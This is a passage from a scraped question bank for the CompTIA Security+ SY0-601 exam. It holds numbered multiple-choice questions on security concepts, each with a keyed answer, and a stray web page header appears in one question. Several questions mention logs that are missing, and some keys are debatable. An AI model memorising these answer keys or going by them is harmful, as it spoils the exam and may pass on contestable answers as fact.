B. Simultaneous authentication of equals
C. Extensive authentication protocol
D. Agentless network access control
Correct Answer: A

Question #119
Which of the following secure coding techniques makes compromised code more difficult for hackers to use?
A. Obfuscation
B. Normalization
C. Execution
D. Reuse
Correct Answer: A

Question #120
As part of a security compliance assessment, an auditor performs automated vulnerability scans. In addition, which of the following should the
auditor do to complete the assessment?
A. User behavior analysis
B. Packet captures
C. Configuration reviews
D. Log analysis
Correct Answer: C

Question #121
A database administrator wants to grant access to an application that will be reading and writing data to a database. The database is shared by
other applications also used by the finance department. Which of the following account types is MOST appropriate for this purpose?
A. Service
B. Shared
C. Generic
D. Admin
Correct Answer: A

Question #122
A security analyst generated a file named host1.pcap and shared it with a team member who is going to use it for further incident analysis. Which
of the following tools will the other team member MOST likely use to open this file?
A. Autopsy
B. Memdump
C. FTK imager
D. Wireshark
Correct Answer: D

Question #123
An application developer accidentally uploaded a company's code-signing certificate private key to a public web server. The company is concerned
about malicious use of its certificate. Which of the following should the company do FIRST?
A. Delete the private key from the repository.
B. Verify the public key is not exposed as well.
C. Update the DLP solution to check for private keys.
D. Revoke the code-signing certificate.
Correct Answer: D

Question #124
An organization implemented a process that compares the settings currently configured on systems against secure configuration guidelines in
order to identify any gaps. Which of the following control types has the organization implemented?
A. Compensating
B. Corrective
C. Preventive
D. Detective
Correct Answer: D

Question #125
The Chief Information Security Officer directed a risk reduction in shadow IT and created a policy requiring all unsanctioned high-risk SaaS
applications to be blocked from user access. Which of the following is the BEST security solution to reduce this risk?
A. CASB
B. VPN concentrator
C. MFA
D. VPC endpoint
Correct Answer: A

Question #126
A technician enables full disk encryption on a laptop that will be taken on a business trip. Which of the following does this process BEST protect?
A. Data in transit
B. Data in processing
C. Data at rest
D. Data tokenization
Correct Answer: C

Question #127
A security analyst was called to investigate a file received directly from a hardware manufacturer. The analyst is trying to determine whether the
file was modified in transit before installation on the user's computer. Which of the following can be used to safely assess the file?
A. Check the hash of the installation file.
B. Match the file names.
C. Verify the URL download location.
D. Verify the code signing certificate.
Correct Answer: A

Question #128
A help desk technician receives a phone call from someone claiming to be a part of the organization's cybersecurity incident response team. The
caller asks the technician to verify the network's internal firewall IP Address. Which of the following is the technician's BEST course of action?
A. Direct the caller to stop by the help desk in person and hang up declining any further requests from the caller.
B. Ask for the caller's name, verify the person's identity in the email directory, and provide the requested information over the phone.
C. Write down the phone number of the caller if possible, the name of the person requesting the information, hang up, and notify the
organization's cybersecurity officer.
D. Request the caller send an email for identity verification and provide the requested information via email to the caller.
Correct Answer: C

Question #129
Which of the following would BEST provide detective and corrective controls for thermal regulation?
A. A smoke detector
B. A fire alarm
C. An HVAC system
D. A fire suppression system
E. Guards
Correct Answer: C

Question #130
Which of the following is a benefit of including a risk management framework into an organization's security approach?
A. It defines expected service levels from participating supply chain partners to ensure system outages are remediated in a timely manner.
B. It identifies specific vendor products that have been tested and approved for use in a secure environment.
C. It provides legal assurances and remedies in the event a data breach occurs.
D. It incorporates control, development, policy, and management activities into IT operations.
Correct Answer: D

Question #131
An organization maintains several environments in which patches are developed and tested before being deployed to an operational status. Which
of the following is the environment in which patches will be deployed just prior to being put into an operational status?
A. Development
B. Test
C. Production
D. Staging
Correct Answer: D

Question #132
During a trial, a judge determined evidence gathered from a hard drive was not admissible. Which of the following BEST explains this reasoning?
A. The forensic investigator forgot to run a checksum on the disk image after creation.
B. The chain of custody form did not note time zone offsets between transportation regions.
C. The computer was turned off, and a RAM image could not be taken at the same time.
D. The hard drive was not properly kept in an antistatic bag when it was moved.
Correct Answer: B

Question #133
An organization wants to implement a biometric system with the highest likelihood that an unauthorized user will be denied access. Which of the
following should the organization use to compare biometric solutions?
A. FRR
B. Difficulty of use
C. Cost
D. FAR
E. CER
Correct Answer: D

Question #134
A company recently experienced a significant data loss when proprietary information was leaked to a competitor. The company took special
precautions by using proper labels; however, email filter logs do not have any record of the incident. An investigation confirmed the corporate
network was not breached, but documents were downloaded from an employee's COPE tablet and passed to the competitor via cloud storage.
Which of the following is the BEST remediation for this data leak?
A. User training
B. CASB
C. MDM
D. DLP
Correct Answer: D

Question #135
An attacker was eavesdropping on a user who was shopping online. The attacker was able to spoof the IP address associated with the shopping
site. Later, the user received an email regarding the credit card statement with unusual purchases. Which of the following attacks took place?
A. On-path attack
B. Protocol poisoning
C. Domain hijacking
D. Bluejacking
Correct Answer: A

Question #136
A company is considering transitioning to the cloud. The company employs individuals from various locations around the world. The company
does not want to increase its on premises infrastructure blueprint and only wants to pay for additional compute power required. Which of the
following solutions would BEST meet the needs of the company?
A. Private cloud
B. Hybrid environment
C. Managed security service provider
D. Hot backup site
Correct Answer: B

Question #137
After multiple on premises security solutions were migrated to the cloud, the incident response time increased. The analysts are spending a long
time trying to trace information on different cloud consoles and correlating data in different formats. Which of the following can be used to
optimize the incident response time?
A. CASB
B. VPC
C. SWG
D. CMS
Correct Answer: A

Question #138
Which of the following control types would be BEST to use in an accounting department to reduce losses from fraudulent transactions?
A. Recovery
B. Deterrent
C. Corrective
D. Detective
Correct Answer: D

Question #139
A company is receiving emails with links to phishing sites that look very similar to the company's own website address and content. Which of the
following is the
BEST way for the company to mitigate this attack?
A. Create a honeynet to trap attackers who access the VPN with credentials obtained by phishing.
B. Generate a list of domains similar to the company's own and implement a DNS sinkhole for each.
C. Disable POP and IMAP on all Internet-facing email servers and implement SMTPS.
D. Use an automated tool to flood the phishing websites with fake usernames and passwords.
Correct Answer: B

Question #140
A SOC operator is receiving continuous alerts from multiple Linux systems indicating that unsuccessful SSH attempts to a functional user ID have
been attempted on each one of them in a short period of time. Which of the following BEST explains this behavior?
A. Rainbow table attack
B. Password spraying
C. Logic bomb
D. Malware bot
Correct Answer: B

Question #141
A tax organization is working on a solution to validate the online submission of documents. The solution should be carried on a portable USB
device that should be inserted on any computer that is transmitting a transaction securely. Which of the following is the BEST certificate for these
requirements?
A. User certificate
B. Self-signed certificate
C. Computer certificate
D. Root certificate
Correct Answer: A

Question #142
A routine audit of medical billing claims revealed that several claims were submitted without the subscriber's knowledge. A review of the audit
logs for the medical billing company's system indicated a company employee downloaded customer records and adjusted the direct deposit
information to a personal bank account.
Which of the following does this action describe?
A. Insider threat
B. Social engineering
C. Third-party risk
D. Data breach
Correct Answer: A

Question #143
A recent audit cited a risk involving numerous low-criticality vulnerabilities created by a web application using a third-party library. The
development staff state there are still customers using the application even though it is end of life and it would be a substantial burden to update
the application for compatibility with more secure libraries. Which of the following would be the MOST prudent course of action?
A. Accept the risk if there is a clear road map for timely decommission.
B. Deny the risk due to the end-of-life status of the application.
C. Use containerization to segment the application from other applications to eliminate the risk.
D. Outsource the application to a third-party developer group.
Correct Answer: A

Question #144
A security analyst is evaluating solutions to deploy an additional layer of protection for a web application. The goal is to allow only encrypted
communications without relying on network devices. Which of the following can be implemented?
A. HTTP security header
B. DNSSEC implementation
C. SRTP
D. S/MIME
Correct Answer: A

Question #145
A company labeled some documents with the public sensitivity classification. This means the documents can be accessed by:
A. employees of other companies and the press.
B. all members of the department that created the documents.
C. only the company's employees and those listed in the document.
D. only the individuals listed in the documents.
Correct Answer: A

Question #146
Which of the following is the MOST relevant security check to be performed before embedding third-party libraries in developed code?
A. Check to see if the third party has resources to create dedicated development and staging environments.
B. Verify the number of companies that downloaded the third-party code and the number of contributions on the code repository.
C. Assess existing vulnerabilities affecting the third-party code and the remediation efficiency of the libraries' developers.
D. Read multiple penetration-testing reports for environments running software that reused the library.
Correct Answer: C

Question #147
A help desk technician receives an email from the Chief Information Officer (CIO) asking for documents. The technician knows the CIO is on
vacation for a few weeks. Which of the following should the technician do to validate the authenticity of the email?
A. Check the metadata in the email header of the received path in reverse order to follow the email's path.
B. Hover the mouse over the CIO's email address to verify the email address.
C. Look at the metadata in the email header and verify the ג€From:ג€ line matches the CIO's email address.
D. Forward the email to the CIO and ask if the CIO sent the email requesting the documents.
Correct Answer: A

Question #148
A company needs to validate its updated incident response plan using a real-world scenario that will test decision points and relevant incident
response actions without interrupting daily operations. Which of the following would BEST meet the company's requirements?
A. Red-team exercise
B. Capture-the-flag exercise
C. Tabletop exercise
D. Phishing exercise
Correct Answer: C

Question #149
Security analysts are conducting an investigation of an attack that occurred inside the organization's network. An attacker was able to collect
network traffic between workstations throughout the network. The analysts review the following logs:
The Layer 2 address table has hundreds of entries similar to the ones above. Which of the following attacks has MOST likely occurred?
A. SQL injection
B. DNS spoofing
C. MAC flooding
D. ARP poisoning
Correct Answer: C

Question #150
A security policy states that common words should not be used as passwords. A security auditor was able to perform a dictionary attack against
corporate credentials. Which of the following controls was being violated?
A. Password complexity
B. Password history
C. Password reuse
D. Password length
Correct Answer: A

Question #151
A SOC operator is analyzing a log file that contains the following entries:
Which of the following explains these log entries?
A. SQL injection and improper input-handling attempts
B. Cross-site scripting and resource exhaustion attempts
C. Command injection and directory traversal attempts
D. Error handling and privilege escalation attempts
Correct Answer: C

Question #152
A security incident has been resolved. Which of the following BEST describes the importance of the final phase of the incident response plan?
A. It examines and documents how well the team responded, discovers what caused the incident, and determines how the incident can be
avoided in the future.
B. It returns the affected systems back into production once systems have been fully patched, data restored, and vulnerabilities addressed.
C. It identifies the incident and the scope of the breach, how it affects the production environment, and the ingress point.
D. It contains the affected systems and disconnects them from the network, preventing further spread of the attack or breach.
Correct Answer: A

Question #154
During the onboarding process, an employee needs to create a password for an intranet account. The password must include ten characters,
numbers, and letters, and two special characters. Once the password is created, the company will grant the employee access to other company-
owned websites based on the intranet profile. Which of the following access management concepts is the company most likely using to safeguard
intranet accounts and grant access to multiple sites based on a user's intranet account? (Choose two.)
A. Federation
B. Identity proofing
C. Password complexity
D. Default password changes
E. Password manager
F. Open authentication
Correct Answer: AC

Question #159
A large bank with two geographically dispersed data centers is concerned about major power disruptions at both locations. Every day each
location experiences very brief outages that last for a few seconds. However, during the summer a high risk of intentional brownouts that last up
to an hour exists, particularly at one of the locations near an industrial smelter. Which of the following is the BEST solution to reduce the risk of
data loss?
A. Dual supply
B. Generator
C. UPS
D. POU
E. Daily backups
Correct Answer: C

Question #160
Which of the following would be the BEST way to analyze diskless malware that has infected a VDI?
A. Shut down the VDI and copy off the event logs.
B. Take a memory snapshot of the running system.
C. Use NetFlow to identify command-and-control IPs.
D. Run a full on-demand scan of the root volume.
Correct Answer: B

Question #161
Users are presented with a banner upon each login to a workstation. The banner mentions that users are not entitled to any reasonable
expectation of privacy and access is for authorized personnel only. In order to proceed past that banner, users must click the OK button. Which of
the following is this an example of?
A. AUP
B. NDA
C. SLA
D. MOU
Correct Answer: A

Question #162
The Chief Information Security Officer is concerned about employees using personal email rather than company email to communicate with
clients and sending sensitive business information and PII. Which of the following would be the BEST solution to install on the employees'
workstations to prevent information from leaving the company's network?
A. HIPS
B. DLP
C. HIDS
D. EDR
Correct Answer: B

Question #163
On the way into a secure building, an unknown individual strikes up a conversation with an employee. The employee scans the required badge at
the door while the unknown individual holds the door open, seemingly out of courtesy, for the employee. Which of the following social engineering
techniques is being utilized?
A. Shoulder surfing
B. Watering-hole attack
C. Tailgating
D. Impersonation
Correct Answer: C

Question #164
Two hospitals merged into a single organization. The privacy officer requested a review of all records to ensure encryption was used during record
storage, in compliance with regulations. During the review, the officer discovered that medical diagnosis codes and patient names were left
unsecured. Which of the following types of data does this combination BEST represent?
A. Personal health information
B. Personally identifiable information
C. Tokenized data
D. Proprietary data
Correct Answer: A

Question #165
A company discovered that terabytes of data have been exfiltrated over the past year after an employee clicked on an email link. The threat
continued to evolve and remain undetected until a security analyst noticed an abnormal amount of external connections when the employee was
not working. Which of the following is the MOST likely threat actor?
A. Shadow IT
B. Script kiddies
C. APT
D. Insider threat
Correct Answer: C

Question #166
An untrusted SSL certificate was discovered during the most recent vulnerability scan. A security analyst determines the certificate is signed
properly and is a valid wildcard. This same certificate is installed on the other company servers without issue. Which of the following is the MOST
likely reason for this finding?
A. The required intermediate certificate is not loaded as part of the certificate chain.
B. The certificate is on the CRL and is no longer valid.
C. The corporate CA has expired on every server, causing the certificate to fail verification.
D. The scanner is incorrectly configured to not trust this certificate when detected on the server.
Correct Answer: A

Question #167
A company wants to improve end users' experiences when they log in to a trusted partner website. The company does not want the users to be
issued separate credentials for the partner website. Which of the following should be implemented to allow users to authenticate using their own
credentials to log in to the trusted partner's website?
A. Directory service
B. AAA server
C. Federation
D. Multifactor authentication
Correct Answer: C

Question #168
A company is under investigation for possible fraud. As part of the investigation, the authorities need to review all emails and ensure data is not
deleted. Which of the following should the company implement to assist in the investigation?
A. Legal hold
B. Chain of custody
C. Data loss prevention
D. Content filter
Correct Answer: A

Question #169
A user wanted to catch up on some work over the weekend but had issues logging in to the corporate network using a VPN. On Monday, the user
opened a ticket for this issue but was able to log in successfully. Which of the following BEST describes the policy that is being implemented?
A. Time-based logins
B. Geofencing
C. Network location
D. Password history
Correct Answer: A

Question #170
A major political party experienced a server breach. The hacker then publicly posted stolen internal communications concerning campaign
strategies to give the opposition party an advantage. Which of the following BEST describes these threat actors?
A. Semi-authorized hackers
B. State actors
C. Script kiddies
D. Advanced persistent threats
Correct Answer: B

Question #171
A company is required to continue using legacy software to support a critical service. Which of the following BEST explains a risk of this practice?
A. Default system configuration
B. Unsecure protocols
C. Lack of vendor support
D. Weak encryption
Correct Answer: C

Question #172
A security analyst has been tasked with ensuring all programs that are deployed into the enterprise have been assessed in a runtime environment.
Any critical issues found in the program must be sent back to the developer for verification and remediation. Which of the following BEST
describes the type of assessment taking place?
A. Input validation
B. Dynamic code analysis
C. Fuzzing
D. Manual code review
Correct Answer: B

Question #173
Which of the following can work as an authentication method and as an alerting mechanism for unauthorized access attempts?
A. Smart card
B. Push notifications
C. Attestation service
D. HMAC-based
E. one-time password
Correct Answer: B

Question #174
A company has a flat network in the cloud. The company needs to implement a solution to segment its production and non-production servers
without migrating servers to a new network. Which of the following solutions should the company implement?
A. Intranet
B. Screened subnet
C. VLAN segmentation
D. Zero Trust
Correct Answer: C

Question #175
The president of a regional bank likes to frequently provide SOC tours to potential investors. Which of the following policies BEST reduces the risk
of malicious activity occurring after a tour?
A. Password complexity
B. Acceptable use
C. Access control
D. Clean desk
Correct Answer: D

Question #176
A Chief Information Security Officer has defined resiliency requirements for a new data center architecture. The requirements are as follows:
* Critical fileshares will remain accessible during and after a natural disaster.
* Five percent of hard disks can fail at any given time without impacting the data.
* Systems will be forced to shut down gracefully when battery levels are below 20%.
Which of the following are required to BEST meet these objectives? (Choose three.)
A. Fiber switching
B. IaC
C. NAS
D. RAID
E. UPS
F. Redundant power supplies
G. Geographic dispersal
H. Snapshots
I. Load balancing
Correct Answer: DEG

Question #177
Which of the following is a security best practice that ensures the integrity of aggregated log files within a SIEM?
A. Set up hashing on the source log file servers that complies with local regulatory requirements.
B. Back up the aggregated log files at least two times a day or as stated by local regulatory requirements.
C. Write protect the aggregated log files and move them to an isolated server with limited access.
D. Back up the source log files and archive them for at least six years or in accordance with local regulatory requirements.
Correct Answer: A

Question #178
A security analyst is evaluating the risks of authorizing multiple security solutions to collect data from the company's cloud environment. Which of
the following is an immediate consequence of these integrations?
A. Non-compliance with data sovereignty rules
B. Loss of the vendors interoperability support
C. Mandatory deployment of a SIEM solution
D. Increase in the attack surface
Correct Answer: D

Question #179
Which of the following explains why RTO is included in a BIA?
A. It identifies the amount of allowable downtime for an application or system.
B. It prioritizes risks so the organization can allocate resources appropriately.
C. It monetizes the loss of an asset and determines a break-even point for risk mitigation.
D. It informs the backup approach so that the organization can recover data to a known time.
Correct Answer: A

Question #180
A security analyst is reviewing web-application logs and finds the following log:
Which of the following attacks is being observed?
A. Directory traversal
B. XSS
C. CSRF
D. On-path attack
Correct Answer: A

Question #181
A security analyst is reviewing the vulnerability scan report for a web server following an incident. The vulnerability that was used to exploit the
server is present in historical vulnerability scan reports, and a patch is available for the vulnerability. Which of the following is the MOST likely
cause?
A. Security patches were uninstalled due to user impact.
B. An adversary altered the vulnerability scan reports
C. A zero-day vulnerability was used to exploit the web server
D. The scan reported a false negative for the vulnerability
Correct Answer: A

Question #182
Which of the following is a known security risk associated with data archives that contain financial information?
A. Data can become a liability if archived longer than required by regulatory guidance.
B. Data must be archived off-site to avoid breaches and meet business requirements.
C. Companies are prohibited from providing archived data to e-discovery requests.
D. Unencrypted archives should be preserved as long as possible and encrypted.
Correct Answer: A

Question #183
Which of the following BEST describes the process of documenting who has access to evidence?
A. Order of volatility
B. Chain of custody
C. Non-repudiation
D. Admissibility
Correct Answer: B

Question #184
A systems engineer wants to leverage a cloud-based architecture with low latency between network-connected devices that also reduces the
bandwidth that is required by performing analytics directly on the endpoints. Which of the following would BEST meet the requirements? (Choose
two.)
A. Private cloud
B. SaaS
C. Hybrid cloud
D. IaaS
E. DRaaS
F. Fog computing
Correct Answer: CF

Question #185
Which of the following is a policy that provides a greater depth and breadth of knowledge across an organization?
A. Asset management policy
B. Separation of duties policy
C. Acceptable use policy
D. Job rotation policy
Correct Answer: D

Question #186
A company is moving its retail website to a public cloud provider. The company wants to tokenize credit card data but not allow the cloud provider
to see the stored credit card information. Which of the following would BEST meet these objectives?
A. WAF
B. CASB
C. VPN
D. TLS
Correct Answer: B

Question #187
A security analyst is tasked with defining the "something you are" factor of the company's MFA settings. Which of the following is BEST to use to
complete the configuration?
A. Gait analysis
B. Vein
C. Soft token
D. HMAC-based, one-time password
Correct Answer: B

Question #188
Which of the following processes will eliminate data using a method that will allow the storage device to be reused after the process is complete?
A. Pulverizing
B. Overwriting
C. Shredding
D. Degaussing
Correct Answer: B

Question #189
A user's account is constantly being locked out. Upon further review, a security analyst found the following in the SIEM:
Which of the following describes what is occurring?
A. An attacker is utilizing a password-spraying attack against the account.
B. An attacker is utilizing a dictionary attack against the account.
C. An attacker is utilizing a brute-force attack against the account.
D. An attacker is utilizing a rainbow table attack against the account.
Correct Answer: C

Question #190
A web server has been compromised due to a ransomware attack. Further investigation reveals the ransomware has been in the server for the
past 72 hours. The systems administrator needs to get the services back up as soon as possible. Which of the following should the administrator
use to restore services to a secure state?
A. The last incremental backup that was conducted 72 hours ago
B. The last known-good configuration
C. The last full backup that was conducted seven days ago
D. The baseline OS configuration
Correct Answer: C

Question #191
A network engineer created two subnets that will be used for production and development servers. Per security policy production and
development servers must each have a dedicated network that cannot communicate with one another directly. Which of the following should be
deployed so that server administrators can access these devices?
A. VLANs
B. Internet proxy servers
C. NIDS
D. Jump servers
Correct Answer: D

Question #192
A social media company based in North America is looking to expand into new global markets and needs to maintain compliance with
international standards.
With which of the following is the company's data protection officer MOST likely concerned?
A. NIST Framework
B. ISO 27001
C. GDPR
D. PCI-DSS
Correct Answer: C

Question #193
A security architect is required to deploy to conference rooms some workstations that will allow sensitive data to be displayed on large screens.
Due to the nature of the data, it cannot be stored in the conference rooms. The file share is located in a local data center. Which of the following
should the security architect recommend to BEST meet the requirement?
A. Fog computing and KVMs
B. VDI and thin clients
C. Private cloud and DLP
D. Full drive encryption and thick clients
Correct Answer: B

Question #194
A Chief Information Security Officer wants to ensure the organization is validating and checking the integrity of zone transfers. Which of the
following solutions should be implemented?
A. DNSSEC
B. LDAPS
C. NGFW
D. DLP
Correct Answer: A

Question #195
Which of the following controls is used to make an organization initially aware of a data compromise?
A. Protective
B. Preventative
C. Corrective
D. Detective
Correct Answer: D

Question #196
An annual information security assessment has revealed that several OS-level configurations are not in compliance due to outdated hardening
standards the company is using. Which of the following would be BEST to use to update and reconfigure the OS-level security configurations?
A. CIS benchmarks
B. GDPR guidance
C. Regional regulations
D. ISO 27001 standards
Correct Answer: A

Question #197
A company acquired several other small companies. The company that acquired the others is transitioning network services to the cloud. The
company wants to make sure that performance and security remain intact. Which of the following BEST meets both requirements?
A. High availability
B. Application security
C. Segmentation
D. Integration and auditing
Correct Answer: C

Question #198
After a recent external audit, the compliance team provided a list of several non-compliant, in-scope hosts that were not encrypting cardholder
data at rest. Which of the following compliance frameworks would address the compliance team's GREATEST concern?
A. PCI DSS
B. GDPR
C. ISO 27001
D. NIST CSF
Correct Answer: A

Question #199
A security analyst is receiving several alerts per user and is trying to determine if various logins are malicious. The security analyst would like to
create a baseline of normal operations and reduce noise. Which of the following actions should the security analyst perform?
A. Adjust the data flow from authentication sources to the SIEM.
B. Disable email alerting and review the SIEM directly.
C. Adjust the sensitivity levels of the SIEM correlation engine.
D. Utilize behavioral analysis to enable the SIEM's learning mode.
Correct Answer: D

Question #200
Which of the following is the MOST effective way to detect security flaws present on third-party libraries embedded on software before it is
released into production?
A. Employ different techniques for server- and client-side validations
B. Use a different version control system for third-party libraries
C. Implement a vulnerability scan to assess dependencies earlier on SDLC
D. Increase the number of penetration tests before software release
Correct Answer: C

Question #201
Which of the following prevents an employee from seeing a colleague who is visiting an inappropriate website?
A. Job rotation policy
B. NDA
C. AUP
D. Separation of duties policy
Correct Answer: C

Question #202
A user reports falling for a phishing email to an analyst. Which of the following system logs would the analyst check FIRST?
A. DNS
B. Message gateway
C. Network
D. Authentication
Correct Answer: B

Question #203
An attacker has determined the best way to impact operations is to infiltrate third-party software vendors. Which of the following vectors is being
exploited?
A. Social media
B. Cloud
C. Supply chain
D. Social Engineering
Correct Answer: C

Question #204
An organization would like to give remote workers the ability to use applications hosted inside the corporate network. Users will be allowed to use
their personal computers, or they will be provided organization assets. Either way, no data or applications will be installed locally on any user
systems. Which of the following mobile solutions would accomplish these goals?
A. VDI
B. MDM
C. COPE
D. UTM
Correct Answer: A

Question #205
Which of the following is used to ensure that evidence is admissible in legal proceedings when it is collected and provided to the authorities?
A. Chain of custody
B. Legal hold
C. Event log
D. Artifacts
Correct Answer: A

Question #206
The Chief Information Security Officer (CISO) of a bank recently updated the incident response policy. The CISO is concerned that members of the
incident response team do not understand their roles. The bank wants to test the policy but with the least amount of resources or impact. Which
of the following BEST meets the requirements?
A. Warm site failover
B. Tabletop walk-through
C. Parallel path testing
D. Full outage simulation
Correct Answer: B

Question #207
Which of the following control types fixes a previously identified issue and mitigates a risk?
A. Detective
B. Corrective
C. Preventative
D. Finalized
Correct Answer: B

Question #208
An analyst is reviewing logs associated with an attack. The logs indicate an attacker downloaded a malicious file that was quarantined by the AV
solution. The attacker utilized a local non-administrative account to restore the malicious file to a new location. The file was then used by another
process to execute a payload.
Which of the following attacks did the analyst observe?
A. Privilege escalation
B. Request forgeries
C. Injection
D. Replay attack
Correct Answer: C

Question #209
A security engineer must deploy two wireless routers in an office suite. Other tenants in the office building should not be able to connect to this
wireless network.
Which of the following protocols should the engineer implement to ensure the STRONGEST encryption?
A. WPS
B. WPA2
C. WAP
D. HTTPS
Correct Answer: B

Question #210
An attacker browses a company's online job board attempting to find any relevant information regarding the technologies the company uses.
Which of the following BEST describes this social engineering technique?
A. Hoax
B. Reconnaissance
C. Impersonation
D. Pretexting
Correct Answer: B

Question #211
During an incident response process involving a laptop, a host was identified as the entry point for malware. The management team would like to
have the laptop restored and given back to the user. The cybersecurity analyst would like to continue investigating the intrusion on the host. Which
of the following would allow the analyst to continue the investigation and also return the laptop to the user as soon as possible?
A. dd
B. memdump
C. tcpdump
D. head
Correct Answer: A

Question #212
An analyst is trying to identify insecure services that are running on the internal network. After performing a port scan, the analyst identifies that a
server has some insecure services enabled on default ports. Which of the following BEST describes the services that are currently running and the
secure alternatives for replacing them? (Choose three.)
A. SFTP, FTPS
B. SNMPv2, SNMPv3
C. HTTP, HTTPS
D. TFTP, FTP
E. SNMPv1, SNMPv2
F. Telnet, SSH
G. TLS, SSL
H. POP, IMAP
I. Login, rlogin
Correct Answer: BCF

Question #213
A security analyst needs to produce a document that details how a security incident occurred, the steps that were taken for recovery, and how
future incidents can be avoided. During which of the following stages of the response process will this activity take place?
A. Recovery
B. Identification
C. Lessons learned
D. Preparation
Correct Answer: C

Question #214
An administrator is configuring a firewall rule set for a subnet to only access DHCP
, web pages, and SFTP
, and to specifically block FTP
. Which of
the following would BEST accomplish this goal?
A. [Permission Source Destination Port]
Allow: Any Any 80 -
Allow: Any Any 443 -
Allow: Any Any 67 -
Allow: Any Any 68 -
Allow: Any Any 22 -
Deny: Any Any 21 -
Deny: Any Any
B. [Permission Source Destination Port]
Allow: Any Any 80 -
Allow: Any Any 443 -
Allow: Any Any 67 -
Allow: Any Any 68 -
Deny: Any Any 22 -
Allow: Any Any 21 -
Deny: Any Any
C. [Permission Source Destination Port]
Allow: Any Any 80 -
Allow: Any Any 443 -
Allow: Any Any 22 -
Deny: Any Any 67 -
Deny: Any Any 68 -
Deny: Any Any 21 -
Allow: Any Any
D. [Permission Source Destination Port]
Allow: Any Any 80 -
Allow: Any Any 443 -
Deny: Any Any 67 -
Allow: Any Any 68 -
1/3/24, 12:05 AM
SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/
87/297
Allow: Any Any 22 -
Allow: Any Any 21 -
Allow: Any Any
Correct Answer: A

Question #215
While investigating a recent security incident, a security analyst decides to view all network connections on a particular server. Which of the
following would provide the desired information?
A. arp
B. nslookup
C. netstat
D. nmap
Correct Answer: C

Question #216
A company recently decided to allow its employees to use their personally owned devices for tasks like checking email and messaging via mobile
applications. The company would like to use MDM, but employees are concerned about the loss of personal data. Which of the following should
the IT department implement to BEST protect the company against company data loss while still addressing the employees’ concerns?
A. Enable the remote-wiping option in the MDM software in case the phone is stolen.
B. Configure the MDM software to enforce the use of PINs to access the phone.
C. Configure MDM for FDE without enabling the lock screen.
D. Perform a factory reset on the phone before installing the company's applications.
Correct Answer: B

Question #217
The concept of connecting a user account across the systems of multiple enterprises is BEST known as:
A. federation.
B. a remote access policy.
C. multifactor authentication.
D. single sign-on.
Correct Answer: A

Question #218
A user received an SMS on a mobile phone that asked for bank details. Which of the following social-engineering techniques was used in this
case?
A. SPIM
B. Vishing
C. Spear phishing
D. Smishing
Correct Answer: D

Question #219
A company is working on mobile device security after a report revealed that users granted non-verified software access to corporate data. Which
of the following is the MOST effective security control to mitigate this risk?
A. Block access to application stores
B. Implement OTA updates
C. Update the BYOD policy
D. Deploy a uniform firmware
Correct Answer: A

Question #220
A security analyst needs to implement security features across smartphones, laptops, and tablets. Which of the following would be the MOST
effective across heterogeneous platforms?
A. Enforcing encryption
B. Deploying GPOs
C. Removing administrative permissions
D. Applying MDM software
Correct Answer: D

Question #221
The new Chief Information Security Officer at a company has asked the security team to implement stronger user account policies. The new
policies require:
* Users to choose a password unique to their last ten passwords
* Users to not log in from certain high-risk countries
Which of the following should the security team implement? (Choose two.)
A. Password complexity
B. Password history
C. Geolocation
D. Geofencing
E. Geotagging
F. Password reuse
Correct Answer: BD

Question #222
Which of the following is MOST likely to outline the roles and responsibilities of data controllers and data processors?
A. SSAE SOC 2
B. PCI DSS
C. GDPR
D. ISO 31000
Correct Answer: C

Question #223
Which of the following is MOST likely to contain ranked and ordered information on the likelihood and potential impact of catastrophic events that
may affect business processes and systems, while also highlighting the residual risks that need to be managed after mitigating controls have
been implemented?
A. An RTO report
B. A risk register
C. A business impact analysis
D. An asset value register
E. A disaster recovery plan
Correct Answer: B

Question #224
A worldwide manufacturing company has been experiencing email account compromises. In one incident, a user logged in from the corporate
office in France, but then seconds later, the same user account attempted a login from Brazil. Which of the following account policies would BEST
prevent this type of attack?
A. Network location
B. Impossible travel time
C. Geolocation
D. Geofencing
Correct Answer: B

Question #225
A new vulnerability in the SMB protocol on the Windows systems was recently discovered, but no patches are currently available to resolve the
issue. The security administrator is concerned that servers in the company’s DMZ will be vulnerable to external attack; however, the administrator
cannot disable the service on the servers, as SMB is used by a number of internal systems and applications on the LAN. Which of the following
TCP ports should be blocked for all external inbound connections to the DMZ as a workaround to protect the servers? (Choose two.)
A. 135
B. 139
C. 143
D. 161
E. 443
F. 445
Correct Answer: BF

Question #226
A recent phishing campaign resulted in several compromised user accounts. The security incident response team has been tasked with reducing
the manual labor of filtering through all the phishing emails as they arrive and blocking the sender’s email address, along with other time-
consuming mitigation actions. Which of the following can be configured to streamline those tasks?
A. SOAR playbook
B. MDM policy
C. Firewall rules
D. URL filter
E. SIEM data collection
Correct Answer: A

Question #227
A user reports constant lag and performance issues with the wireless network when working at a local coffee shop. A security analyst walks the
user through an installation of Wireshark and gets a five-minute pcap to analyze. The analyst observes the following output:
Which of the following attacks does the analyst MOST likely see in this packet capture?
A. Session replay
B. Evil twin
C. Bluejacking
D. ARP poisoning
Correct Answer: B

Question #228
A security analyst is reviewing the following output from a system:
Which of the following is MOST likely being observed?
A. ARP poisoning
B. Man in the middle
C. Denial of service
D. DNS poisoning
Correct Answer: C

Question #229
Which of the following concepts BEST describes tracking and documenting changes to software and managing access to files and systems?
A. Version control
B. Continuous monitoring
C. Stored procedures
D. Automation
Correct Answer: A

Question #230
A penetration tester is brought on site to conduct a full attack simulation at a hospital. The penetration tester notices a WAP that is hanging from
the drop ceiling by its cabling and is reachable. Which of the following recommendations would the penetration tester MOST likely make given this
observation?
A. Employ a general contractor to replace the drop-ceiling tiles.
B. Place the network cabling inside a secure conduit.
C. Secure the access point and cabling inside the drop ceiling.
D. Utilize only access points that have internal antennas
Correct Answer: C

Question #231
Which of the following techniques eliminates the use of rainbow tables for password cracking?
A. Hashing
B. Tokenization
C. Asymmetric encryption
D. Salting
Correct Answer: D

Question #232
During a security assessment, a security analyst finds a file with overly permissive permissions. Which of the following tools will allow the analyst
to reduce the permissions for the existing users and groups and remove the set-user-ID bit from the file?
A. ls
B. chflags
C. chmod
D. lsof
E. setuid
Correct Answer: C

Question #233
A network administrator is concerned about users being exposed to malicious content when accessing company cloud applications. The
administrator wants to be able to block access to sites based on the AUP
. The users must also be protected because many of them work from
home or at remote locations, providing on-site customer support. Which of the following should the administrator employ to meet these criteria?
A. Implement NAC.
B. Implement an SWG.
C. Implement a URL filter.
D. Implement an MDM.
Correct Answer: B

Question #234
